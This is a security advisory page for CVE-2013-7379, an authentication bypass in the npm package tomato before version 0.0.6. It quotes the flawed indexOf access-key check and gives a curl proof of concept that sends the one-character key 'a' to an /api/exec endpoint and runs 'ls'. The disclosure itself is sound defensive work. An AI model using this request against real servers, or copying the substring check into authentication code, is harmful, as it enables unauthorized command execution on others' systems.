GHSA-9VXC-G2JX-QJ3P

Vulnerability from github – Published: 2020-08-31 22:59 – Updated: 2021-09-23 21:00
VLAI?
Summary
API Admin Auth Weakness in tomato
Details

Versions of tomato prior to 0.0.6 are affected by a somewhat complex authentication bypass vulnerability in the admin service when only a single access key is configured on the server. The vulnerability allows an attacker to guess the password for the admin service, no matter how complex that password is, in less than 200 requests.

Details

The tomato API has an admin service that is enabled by setting up an access_key in the config options. This access_key is intended to protect the API admin from unauthorized access.

Tomato verifies the access_key by checking to see if the server access_key incorporates the user provided value at any location. This allows an attacker to provide a single character as an access_key, and so long as the server key contains at least one instance of that character it will be considered a valid key.

Proof of Concept

This is the snippet of code that does the comparison to authorize requests.

if (access_key && config.master.api.access_key.indexOf(access_key) !== -1) {

For an access_key that is set to anything that includes the letter 'a' the following request would be authorized.

$ curl -X POST "http://localhost:8081/api/exec" -H "Content-Type: application/json" -d @test -H "access-key: a"
{
 "cmd": "ls",
 "path": ".",
 "stdout": "app.js\nconfig.js\nlog\nnode_modules\nserver.js\n",
 "stderr": ""
}

Recommendation

Update to version 0.0.6 or later.

Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tomato"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2013-7379"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:08:49Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Versions of `tomato` prior to 0.0.6 are affected by a somewhat complex authentication bypass vulnerability in the admin service when only a single access key is configured on the server. The vulnerability allows an attacker to guess the password for the admin service, no matter how complex that password is, in less than 200 requests.\n\n\n## Details\nThe tomato API has an admin service that is enabled by setting up an `access_key` in the config options. This `access_key` is intended to protect the API admin from unauthorized access.\n\n\nTomato verifies the `access_key` by checking to see if the server `access_key` incorporates the user provided value at any location. This allows an attacker to provide a single character as an `access_key`, and so long as the server key contains at least one instance of that character it will be considered a valid key.\n\n## Proof of Concept\nThis is the snippet of code that does the comparison to authorize requests.\n\n```\nif (access_key \u0026\u0026 config.master.api.access_key.indexOf(access_key) !== -1) {\n```\n\nFor an access_key that is set to anything that includes the letter \u0027a\u0027 the following request would be authorized.\n\n```\n$ curl -X POST \"http://localhost:8081/api/exec\" -H \"Content-Type: application/json\" -d @test -H \"access-key: a\"\n{\n \"cmd\": \"ls\",\n \"path\": \".\",\n \"stdout\": \"app.js\\nconfig.js\\nlog\\nnode_modules\\nserver.js\\n\",\n \"stderr\": \"\"\n}\n```\n\n\n\n## Recommendation\n\nUpdate to version 0.0.6 or later.",
  "id": "GHSA-9vxc-g2jx-qj3p",
  "modified": "2021-09-23T21:00:28Z",
  "published": "2020-08-31T22:59:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7379"
    },
    {
      "type": "WEB",
      "url": "https://github.com/leizongmin/tomato/commit/9e427d524e04a905312a3294c85e939ed7d57b8c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/leizongmin/tomato"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/38"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2014/05/13/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2014/05/15/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "API Admin Auth Weakness in tomato"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.